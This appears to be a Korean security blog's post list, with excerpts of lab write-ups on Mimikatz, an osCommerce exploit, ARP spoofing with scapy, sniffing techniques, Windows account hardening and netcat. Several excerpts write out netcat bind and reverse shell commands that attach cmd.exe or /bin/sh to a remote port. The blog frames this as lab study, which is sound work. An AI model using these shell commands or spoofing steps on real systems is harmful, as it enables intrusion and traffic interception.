목록분류 전체보기 (420)
외로운 Nova의 작업실
- 설치 https://github.com/ParrotSec/mimikatz GitHub - ParrotSec/mimikatz Contribute to ParrotSec/mimikatz development by creating an account on GitHub. github.com 위 사이트로 들어가서 다운로드하면됩니다. - 개요 Mimikatz는 사용자가 메모리 또는 Windows 운영 체제에서 암호, 해시 및 Kerberos 티켓과 같은 인증 자격 증명을 추출할 수 있는 악용 후 도구입니다. 원래 Windows 운영 체제의 보안 취약점을 입증하기 위한 개념 증명 도구로 개발되었지만 현재는 공격자와 보안 전문가 모두가 보안 평가 및 침투 테스트를 수행하는 데 일반적으로 사용됩니다. Mimikatz..
- 취약점의 원인 분석 원인은 Apache24\htdocs\oscommerce\catalog\install\templates\pages\install_4.php 파일에서 나타납니다.
- exploit 준비 exploit을 위해 윈도우 서버에 nc64 프로그램을 깔았고, 포트도 8989를 열어두었습니다. 이제 서버를 시작합니다. - exlpoit 이제 칼리리눅스로 가서 exploit db 안의 내용을 수정합니다. 아래처럼 말입니다. 이제 실제 파이썬을 실행해줍니다. 그리고 메시지에 적힌대로 configure.php에 접속해줍니다. 이제 칼리리눅스로 nc를 사용해 직접 접속해줍니다. 실제로 서버에 접속하여 exploit 한 것을 확인할 수 있습니다.
- 실험 과정 희생자의 arp cache table에서 기본 게이트웨이 MAC 주소를 공격자가 만든 dns 서버의 MAC 주소로 주고 스니핑을 해보겠습니다. - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 공격자의 dns : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 잘 실행되고 있는지 확인해보겠습니다. 잘 실행됨을 알 수 있습니다. from scapy.all import * import time # ARP 응답 패킷 생성 arp_reply = Ether(dst='00:0C:29:8C:2E:05')/ARP(op='is-a..
- 실험 내용 희생자의 기본 게이트웨이 MAC 주소를 공격자의 MAC주소로 바꾸고 공격자는 wireshark를 통해 패킷을 스니핑할 수 있는 지 확인합니다. - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 원래 대상자 : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 희생자의 ARP 캐시 테이블 - 실험 시작 아래 파이썬 코드로 기본 게이트웨이 MAC을 공격자 MAC으로 변경해줍니다. from scapy.all import * import time # ARP 응답 패킷 생성 arp_reply = Ether(dst='00:0C..
- 취약점 ARP Reply응답을 인증하지않고 그대로 받아들이는 취약점을 이용합니다. - 실험 주제 ARP Spooping 당한 희생자는 MAC에따라서 공격자에게 연결이 될까 아니면 IP에따라서 원래 대상자에게 될까? - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 원래 대상자 : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 192.168.219.120 희생자의 arp cache table 맥번호와 IP가 잘 구성되어있는 것을 확인할 수 있습니다. - 실험계획 1. ARP spooping으로 192.168.219.100의 ..
- 서문 필기와 겹치는게 많아 중요한 내용만 정리하겠습니다. - 허브 환경에서의 스니핑 더미 허브는 전달받은 패킷을 단순히 연결된 모든 노드로 전송하기때문에 허브에 연결되어 있는 모든 노드는 스니퍼를 통한 스니핑이 용이합니다. 네트워크 카드의 동작모드를 무차별 모드(promiscuous mode)로 설정하면 패킷을 모두 수신합니다. - 스위치 환경에서의 스니핑 공격 기법 스위치 MAC Address Table의 버퍼를 오버플로우를 시키면 스위치는 스위칭기능을 못하고 더미 허브처럼 연결된 모든 노드에게 패킷을 전송합니다. 따라서 MAC 주소를 변경하면서 패킷을 지속적으로 전송해 오버플로우를 시킨후 스니핑을 시전합니다. - 내가 특정 호스트이다! 공격자가 특정 호스트의 MAC 주소를 자신의 MAC 주소로 위..
- 계정 관리 기본 관리자 계정인 Administrator를 그대로 사용할 경우 악의적인 공격자에의해 패스워드 무차별 공격에 취약할 수 있습니다. 따라서 유추하기 어려운 계정명으로 변경할 것을 권장합니다. 로컬 보안정책 > 보안 옵션 > Administator 계정 이름 바꾸기 Guest 계정은 불특정 사용자의 시스템 접근을 허용하는 취약한 계정으로 사용 제한을 권장하며 불특정 다수의 접근이 필요한 경우 Guest가 아닌 일반 사용자 계정을 생성해 사용하도록 해야합니다. 컴퓨터관리 > 로컬및 사용자 그룹 > Guest > 계정사용 안함 불필요한 계정이 있을경우 삭제합니다. 관리자 그룹에는 최소한의 계정만을 포함하고 불필요한 계정이 있다면 제거 해야합니다. 컴퓨터 관리 > 로컬 사용자 및 그룹 > 그룹 >..
- 윈도우 nc64 바인드 쉘코드 - kali nc 192.168.219.130 8989 - window nc64 -l -e cmd.exe -p 8989 - 윈도우 nc64 리버스 쉘코드 - window exec("nc64 192.168.219.120 -e cmd.exe 8989"); - kali nc -l -p 8989
- nc nc는 바인드 쉘과 리버스 쉘을 할때 많이 사용되는 프로그램입니다. 보통 리눅스에서는 기본으로 설치되어있지만 윈도우는 따로 설치해주셔야합니다. 아래 링크로 들어가서 설치할 수 있습니다. https://eternallybored.org/misc/netcat/ - nc 사용법 nc 192.168.200.1 7979:192.168.200.1에 7979포트에 접속합니다. nc -l -p 7979:7979포트에 listen합니다. nc -e /bin/sh 192.168.220.1 7979 : 192.168.220.1 ip에 7979포트로 쉘프로그램을 연결합니다. nc64 192.132.123.123 -e cmd.exe 7979 : 192.132.123.123 ip에 7979포트로 쉘프로그램을 연결합니다...